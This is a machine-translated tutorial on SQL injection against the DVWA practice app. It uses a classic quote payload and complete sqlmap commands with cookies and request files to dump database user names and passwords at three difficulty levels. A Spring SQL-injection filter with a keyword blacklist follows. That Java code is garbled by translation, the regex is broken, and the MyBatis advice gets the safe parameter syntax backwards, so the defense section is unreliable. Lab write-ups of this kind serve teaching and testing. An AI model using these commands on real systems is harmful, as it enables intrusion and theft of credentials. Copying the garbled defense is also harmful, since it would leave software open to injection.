To prepare

Penetration tools: SQLMap, BurpSuite, PYTHon2.7 (for running SQLMap), Firefox browser, FoxyProxy Firefox proxy plug-in. Installed directly on my side PentestBox, penetrating tools and environment are all run, download website is slow, this is baidu cloud disk download links: link: pan.baidu.com/s/1hMBUiVvN… Extraction code: 8OK5

attack

I. Low level

Test for injection points using 1′ or ‘1’=’1

It obviously exists, and you can inject the link directly using SQLMap

Sqlmap confirms the presence of Boolean – based blind injection, error – based injection, time – based blind injection, and Union – based injection. Now use the following command directly to concatenate the above command.

1.-- DBS gets the database2.-d database name --tables Gets all tables in the library3.-d Database name -t table name -- Columns Gets all the columns in the table4.-d Database name -t Table name -c"Field, field."--dump retrieves data corresponding to table fieldsCopy the code

The results are shown in the following figure

python .\sqlmap.py -u "Http://192.168.199.177/dvwa/vulnerabilities/sqli/? id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=4q8en4tjvhcigke3l6drap3b54" --dbs
Copy the code

python .\sqlmap.py -u "Http://192.168.199.177/dvwa/vulnerabilities/sqli/? id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=4q8en4tjvhcigke3l6drap3b54" -D dvwa --tables
Copy the code

 python .\sqlmap.py -u "Http://192.168.199.177/dvwa/vulnerabilities/sqli/? id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=4q8en4tjvhcigke3l6drap3b54" -D dvwa -T users --columns
Copy the code

 python .\sqlmap.py -u "Http://192.168.199.177/dvwa/vulnerabilities/sqli/? id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=4q8en4tjvhcigke3l6drap3b54" -D dvwa -T users -C "user,password" --dump
Copy the code

The user name and password have been obtained

Second, medium level

The intermediate level front page has a drop-down selection form to control user input, so we use BurpSuite to intercept the request packet and send the changes to the server. Start BurpSuite, use FoxyProxy to forward the request to local port 8080, and click submit

After the character injection failed, the numeric injection succeeded

The content of the request package is saved in a TXT file, and SQLMap will inject test directly against the content of the request package

python .\sqlmap.py -r .\dvwa_medium.txt
Copy the code

The following steps are the same as those of the Low level. The only difference is that the low level database, form and other data are obtained through direct query. The Medium level is obtained through blind guessing. Blind annotation is a manifestation of database names, table names and other information is displayed character by character.

Iii. High level

The high level query submission page is not the same as the query result display page. The purpose of this is to prevent general SQLMAP injection, because during the injection process, SQLMAP cannot obtain the query result on the query submission page, and without feedback, it cannot be further injected. But we can ignore this defense by using –second-order+ query results to display page links.

--second-order This parameter is used to monitor web program input and return on different pagesCopy the code

Intercept high-level commit requests with BurpSuite, save them as TXT files, and launch SQL injection attacks with the following command

python .\sqlmap.py -r .\dvwa_high.txt  --second-order "http://192.168.199.177/dvwa/vulnerabilities/sqli/"
Copy the code

Blind injection based on Boolean type was successfully detected. The following steps are the same as medium level and will not be described again.

defense

Since I do back-end development and often use the Spring Boot framework, I write precautions for Spring projects, but the same principles should apply to other back-end frameworks as well.

  • Use # with caution. Mybatis will not intercept arguments
  • The Filter is used to check user requests and Filter illegitimate requests.
/** * SQL injection filter */
@Component
@WebFilter(urlPatterns = "/*", filterName = "SQLInjection", initParams = { @WebInitParam(name = "regx", value = "(? : ') | (? : -) | (/ \ \ * (? :.|[\\n\\r])*? \ \ * /) | "+ "(\\b(select|update|and|or|delete|insert|trancate|char|into|substr|ascii|declare|exec|count|master|into|drop|execute)\\b ) ")})
public class SqlInjectFilter implements Filter{privateString regx;@Override

  public void init(FilterConfig filterConfig) throws ServletException {this.regx = filterConfig.getInitParameter("regx"); }@Override

  public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {HttpServletRequest req = (HttpServletRequest) servletRequest; The Map parametersMap = servletRequest. GetParameterMap (); Iterator it = parametersMap.entrySet().iterator();while(it.hasNext()) {map.entry Entry = (map.entry) it.next(); String[] value = (String[]) entry.getValue();for (int i = 0; i < value.length; i++) {if (null! = value[i] && value[i].matches(thisRegx)) {log. The error ("The parameter you entered has illegal characters, please enter the correct parameter!"); servletRequest.setAttribute("err"."The parameter you entered has illegal characters, please enter the correct parameter!"); servletRequest.setAttribute("pageUrl", the req. GetRequestURI ()); servletRequest.getRequestDispatcher(servletRequest.getServletContext().getContextPath() +"/error").forward(servletRequest, servletResponse);return; }}}} filterchain. doFilter(servletRequest, servletResponse); }@Override
  public void destroy(a) {}}Copy the code